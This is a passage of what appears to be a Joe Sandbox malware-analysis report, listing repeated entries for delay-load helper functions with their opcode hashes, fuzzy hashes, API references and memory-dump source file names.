Opcode ID: 5fe2af56692e5fd07efb695d5c40db89b25258ff3ef6ec16502a826c8f87b8df
Instruction ID: 1fc440d779c7198f265c361b2d0b80a56ff2bc266eef55262ab2c03b21cb4d7a
Opcode Fuzzy Hash: 5fe2af56692e5fd07efb695d5c40db89b25258ff3ef6ec16502a826c8f87b8df
Instruction Fuzzy Hash: 6AB092A12680026D31087144694AE3A0A68E4C2B11720481AB10BD2480D44459054431

Function 005AD8E8 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 005AD8A3

Part of subcall function 005ADF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 005ADFD6
Part of subcall function 005ADF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 005ADFE7

Memory Dump Source

Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: d0b3f3046baac18d7691236bd3be19f02505c754afb7412cd7670d675407f862
Instruction ID: 9b1eb1069ea192c3129667b1a3f2b3b85ec7a1d156776805972f99886989387c
Opcode Fuzzy Hash: d0b3f3046baac18d7691236bd3be19f02505c754afb7412cd7670d675407f862
Instruction Fuzzy Hash: 74B092A12681026C314871446C4AE3A0A68E4C2B11720491AB10BD2480D44458444431

Function 005AD891 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 005AD8A3

Part of subcall function 005ADF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 005ADFD6
Part of subcall function 005ADF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 005ADFE7

Memory Dump Source

Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 69ee40c512c40b4cbae8b4630e9c8f93a63e115ff169a20b09f9679347e64315
Instruction ID: fefbf68355745b0c702c4844910485958b9ef1f819946f51b9f92157d6606abb
Opcode Fuzzy Hash: 69ee40c512c40b4cbae8b4630e9c8f93a63e115ff169a20b09f9679347e64315
Instruction Fuzzy Hash: C9B092952682026C31083140A89AE3F0E28E4C2B11720892AB10BA148094445C488431

Function 005AD8B6 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 005AD8A3

Part of subcall function 005ADF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 005ADFD6
Part of subcall function 005ADF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 005ADFE7

Memory Dump Source

Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 74e2b19f3b6bb25919a40ada6113aa1ede3ade696a6b36ed6ee54f2ad6bc9cbf
Instruction ID: dd726ae7fd9b585263f4583b9cf9045a4eced83830f180f983561d9b5b57a4fc
Opcode Fuzzy Hash: 74e2b19f3b6bb25919a40ada6113aa1ede3ade696a6b36ed6ee54f2ad6bc9cbf
Instruction Fuzzy Hash: 50B092922690026C31087144684BE3A0A68E4C2B11720881EB50BD2580D54458094431

Function 005AD8AC Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 005AD8A3

Part of subcall function 005ADF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 005ADFD6
Part of subcall function 005ADF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 005ADFE7

Memory Dump Source

Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 0eff3c6bc8be6a85cfbe7c6fb95a458198620b7573ddab280ae8701acafd026a
Instruction ID: e841715479b3e6bcc54841b2fb50e57af796d6c5d9061f5186ea1f06a52470e4
Opcode Fuzzy Hash: 0eff3c6bc8be6a85cfbe7c6fb95a458198620b7573ddab280ae8701acafd026a
Instruction Fuzzy Hash: 28B012D526C1076C31087144AC8BF3F0F7CF4C2B11730881EB10BD24C0D4445C044531

Function 005AD942 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 005AD8A3

Part of subcall function 005ADF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 005ADFD6
Part of subcall function 005ADF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 005ADFE7

Memory Dump Source

Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 0b491aaae88e7824ece5a1dc4ffd3581aff6e7e35cda85c89fe2561dfeede928
Instruction ID: 87b842afd99842d434f6433768ec17d4978d47100adcefd5e2b859f9443da3ea
Opcode Fuzzy Hash: 0b491aaae88e7824ece5a1dc4ffd3581aff6e7e35cda85c89fe2561dfeede928
Instruction Fuzzy Hash: 3CB092A12680026D31087144694AE3A0AA8E4C2B11B20481AB10BD24C0D44458054831

Function 005AD910 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 005AD8A3

Part of subcall function 005ADF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 005ADFD6
Part of subcall function 005ADF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 005ADFE7

Memory Dump Source

Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 50fa5987e9208b5b653b1a69be1e4fda4540b7a742f9322c4b69427bff90ede2
Instruction ID: 3f76db052cd0048aa244bb40dafe572c0ab9c934c7db607b18e4fbbd685ce0cc
Opcode Fuzzy Hash: 50fa5987e9208b5b653b1a69be1e4fda4540b7a742f9322c4b69427bff90ede2
Instruction Fuzzy Hash: DAB012E16AD1036C314872446C4BF3F0F7DF4C2B11B30491EB10BD24C0D4445C444431

Function 005AD906 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 005AD8A3

Part of subcall function 005ADF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 005ADFD6
Part of subcall function 005ADF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 005ADFE7

Memory Dump Source

Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: bf7b46e3ba6b7f12c8a6c59fad5486d8efba4f66c4aa192de7f2712b39f51edf
Instruction ID: aae27f6909964a0830e126983318f0dc0e6416d5f7c73116156aacf0eb264f5a
Opcode Fuzzy Hash: bf7b46e3ba6b7f12c8a6c59fad5486d8efba4f66c4aa192de7f2712b39f51edf
Instruction Fuzzy Hash: 09B012D16AE0036C310871446C4BF3F0F7DF4C3B11B30881EB50BD24C0D4445C044431

Function 005AD92E Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 005AD8A3

Part of subcall function 005ADF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 005ADFD6
Part of subcall function 005ADF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 005ADFE7

Memory Dump Source

Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 66706f40a6f1e00fe16bd4399ddb7596c522649a62a916bdba1710233db03f0d
Instruction ID: 3e927ef4c5ff232a3f6b526a75cbf4f577f6edb6960703cfcaa3f229dd4961dc
Opcode Fuzzy Hash: 66706f40a6f1e00fe16bd4399ddb7596c522649a62a916bdba1710233db03f0d
Instruction Fuzzy Hash: D0B012D126D0036C310871546C4BF3F0FBCF4C3B11730881EB60BD24C0D5445C044831

Function 005AD924 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 005AD8A3

Part of subcall function 005ADF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 005ADFD6
Part of subcall function 005ADF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 005ADFE7

Memory Dump Source

Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: ac7f635d5b789bb525f62f02d8239ed540eaef3b43ba06cddc7b33a2da4bf2b5
Instruction ID: c327d760857ec0653a34fdbb05dff3c2f80c9f043bcdae90c4b45ecf94f94491
Opcode Fuzzy Hash: ac7f635d5b789bb525f62f02d8239ed540eaef3b43ba06cddc7b33a2da4bf2b5
Instruction Fuzzy Hash: A5B012D16BD0036C310871446C4BF3F0FBDF8C2B11B30481EB10BD24C0D4445C044431

Function 005ADAD9 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 005ADAB2

Part of subcall function 005ADF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 005ADFD6
Part of subcall function 005ADF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 005ADFE7

Memory Dump Source

Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 420c753e5816b4f734a7d6282b69b2e27c7beea175897c9718b752b1c08655be
Instruction ID: 01be331fc92810ddf713dd2d0b32a65388315135efed2521db128b5f7c36ae78
Opcode Fuzzy Hash: 420c753e5816b4f734a7d6282b69b2e27c7beea175897c9718b752b1c08655be
Instruction Fuzzy Hash: A2B012E226C002AC310871457C0BF3F0EBCF0C5B11730891FB10BC1444D8484C094431

Function 005ADACF Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 005ADAB2

Part of subcall function 005ADF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 005ADFD6
Part of subcall function 005ADF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 005ADFE7

Memory Dump Source

Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 942065106df91335e0ac02ecff8e83eabbaefb9754f8a809b3c797acc4f9ef6b
Instruction ID: d8d9c122877fa350b5c9b04c225cfbcb6ddb614ab9b4cfdac884788efc466206
Opcode Fuzzy Hash: 942065106df91335e0ac02ecff8e83eabbaefb9754f8a809b3c797acc4f9ef6b
Instruction Fuzzy Hash: 5CB092A226D002AC31087145680AE3E0AACE0C1B11720851BB40BC1454D84849044431

Function 005ADB01 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 005ADAB2

Part of subcall function 005ADF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 005ADFD6
Part of subcall function 005ADF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 005ADFE7

Memory Dump Source

Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: f33372fb95b5fa45c3d4c308e740226c55e538691b23da12eb6ba685eed0445b
Instruction ID: fdfa13b0f9208cc828e84346148b87c69975962fbc8cc84240f64c626fde0ac6
Opcode Fuzzy Hash: f33372fb95b5fa45c3d4c308e740226c55e538691b23da12eb6ba685eed0445b
Instruction Fuzzy Hash: C8B012E22AC1066C310871467C4BF3F0EBCF0C1B11730851FB00BC1444D8484C044531

Function 005ADBDE Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 005ADBD5

Part of subcall function 005ADF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 005ADFD6
Part of subcall function 005ADF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 005ADFE7

Memory Dump Source

Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 29bac54d6dab093a7e1ca899549c6d3362a249890b454e6186dcc0c9d92a46bf
Instruction ID: e35d273294565c62297f3d81a83312a2044193f0ed6f737d6ed1e6377fb0a5bb
Opcode Fuzzy Hash: 29bac54d6dab093a7e1ca899549c6d3362a249890b454e6186dcc0c9d92a46bf
Instruction Fuzzy Hash: FAB0929626800A6C31086194280BE3A0A7DF0C5F10720442AB10BC194099408C084832

Function 005ADBC3 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 005ADBD5

Part of subcall function 005ADF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 005ADFD6
Part of subcall function 005ADF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 005ADFE7

Memory Dump Source

Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 01b64e1bf7b7ff9a79a99e362f5e21184bab9cd43c64a0d9a06298fa85118973
Instruction ID: 9e551e122e4a157350c1796e6461f393787aec5c73ae9b4997ec746bb84f9a4f
Opcode Fuzzy Hash: 01b64e1bf7b7ff9a79a99e362f5e21184bab9cd43c64a0d9a06298fa85118973
Instruction Fuzzy Hash: 23B0929626810E6C320821802C0BD7B0A3CF0C1F10720452AB1069084099404C484832

Function 005ADBFC Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 005ADBD5

Part of subcall function 005ADF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 005ADFD6
Part of subcall function 005ADF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 005ADFE7

Memory Dump Source

Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 831e71028e78016e1d89be4886fcb89ca165ed3c695d7f4f38af3e5851e84751
Instruction ID: 20034599035ff1c17edf6289d2bb9ed57d8adcc730c589284780d612997d32ae
Opcode Fuzzy Hash: 831e71028e78016e1d89be4886fcb89ca165ed3c695d7f4f38af3e5851e84751
Instruction Fuzzy Hash: 22B0929626800A6D31086184290BE7B0E7CF0C5F10720841AB20AC184099404C054832

Function 005ADBE8 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 005ADBD5

Part of subcall function 005ADF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 005ADFD6
Part of subcall function 005ADF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 005ADFE7

Memory Dump Source

Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 73384fd8bcf10caebe6a77f14261b05015978fbfe2a22ef4162ea3687e197ffd
Instruction ID: 4d729e0a034f391a6835712da8f4f6cf498639bb2f2712ff45674372b9adc71c
Opcode Fuzzy Hash: 73384fd8bcf10caebe6a77f14261b05015978fbfe2a22ef4162ea3687e197ffd
Instruction Fuzzy Hash: 3AB0929626900AAC31086184280BE7B0A7CF0C5F10720841AB50AC2840D9404C084832

Function 005ADC5D Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 005ADC36

Part of subcall function 005ADF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 005ADFD6
Part of subcall function 005ADF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 005ADFE7

Memory Dump Source

Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
